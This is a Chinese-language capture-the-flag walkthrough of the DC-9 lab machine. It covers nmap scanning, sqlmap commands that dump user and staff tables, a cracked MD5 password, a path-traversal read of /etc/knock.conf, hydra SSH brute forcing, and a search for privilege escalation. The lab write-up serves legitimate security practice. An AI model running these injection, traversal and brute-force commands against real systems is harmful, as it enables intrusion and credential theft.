DC-9

#主机探测-端口扫描

1
2
arp-scan -l
nmap -F -T4 -sS 192.168.43.13

D9-1+2

#指纹识别-目录爆破

1
2
whatweb 192.168.43.13
dirsearch -u 192.168.43.13

D9-3+4

#web界面

#直接AWVS跑–存在sql注入漏洞–result.php

1
search存在注入漏洞

​![屏幕截图 2023-10-18 160941](assets/屏幕截图 2023-10-18 160941-20231018170701-dn4z7xq.png)​

#sqlmap梭哈

1
2
3
4
5
6
7
8
9
10
11
sqlmap -u "http://192.168.43.13/results.php" -data "search=1" -dbs

sqlmap -u "http://192.168.43.13/results.php" -data "search=1" -D 'users' --tables

sqlmap -u "http://192.168.43.13/results.php" -data "search=1" -D 'users' -T 'UserDetails' --dump

sqlmap -u "http://192.168.43.13/results.php" -data "search=1" -D 'Staff' -T 'users' --dump

#把得到的账密保存下来,为后续ssh爆破做准备
#存在一串密文“856f5de590ef37314e7c3bdf6f8a66dc ” MD5解密---transorbital1
#解密网站:https://www.somd5.com/

D9-Staff-字段

D9-字段

D9-库

D9-表

#登录web账密

D9-登录

#存在任意文件读取漏洞

1
2
#页面底部存在 “File does not exist"
#可能存在任意文件读取漏洞

D9-存在问文件包含漏洞

#查看knock配置文件

1
2
3
#由于之前nmap扫描时,22端口为filter状态,猜测应该是knock这个服务存在
#利用file协议
#?file=../../../../../../etc/knock.conf

D9-kncok配置

#海德拉爆破ssh账密

1
2
#将之前保存下来的账密作为字典
hydra -L user.txt -P miam.txt 192.168.43.13 ssh

D9-海德拉

#三个用户ssh

1
2
3
4
joerty,chandleb,janitor
ssh joerty#192.168.43.13
ssh [email protected]
ssh [email protected]

​![屏幕截图 2023-10-18 152842](assets/屏幕截图 2023-10-18 152842-20231018171319-xtiolia.png)​

​![屏幕截图 2023-10-18 152923](assets/屏幕截图 2023-10-18 152923-20231018171319-8q8z3cp.png)​

​![屏幕截图 2023-10-18 152955](assets/屏幕截图 2023-10-18 152955-20231018171319-nqylfen.png)​

#janitor存在多余目录

1
2
#查看此目录--存在密码--追加miam.txt
echo XXX,XXX,XXX >> miam.txt

#二次爆破

1
2
hydra -L user.txt -P miam.txt
#得到jerey账密

D9-爆破新的ssh

#ssh登录

1
ssh [email protected]

D9-登录fredf

#提权

1
2
3
4
5
6
#寻找提权方法
sudo -l
find / -user root -perm -4000 -print 2>/dev/null

/opt/.../test/test下存在无密码可执行root权限文件

D9-寻找提权

#FLAG

FLAG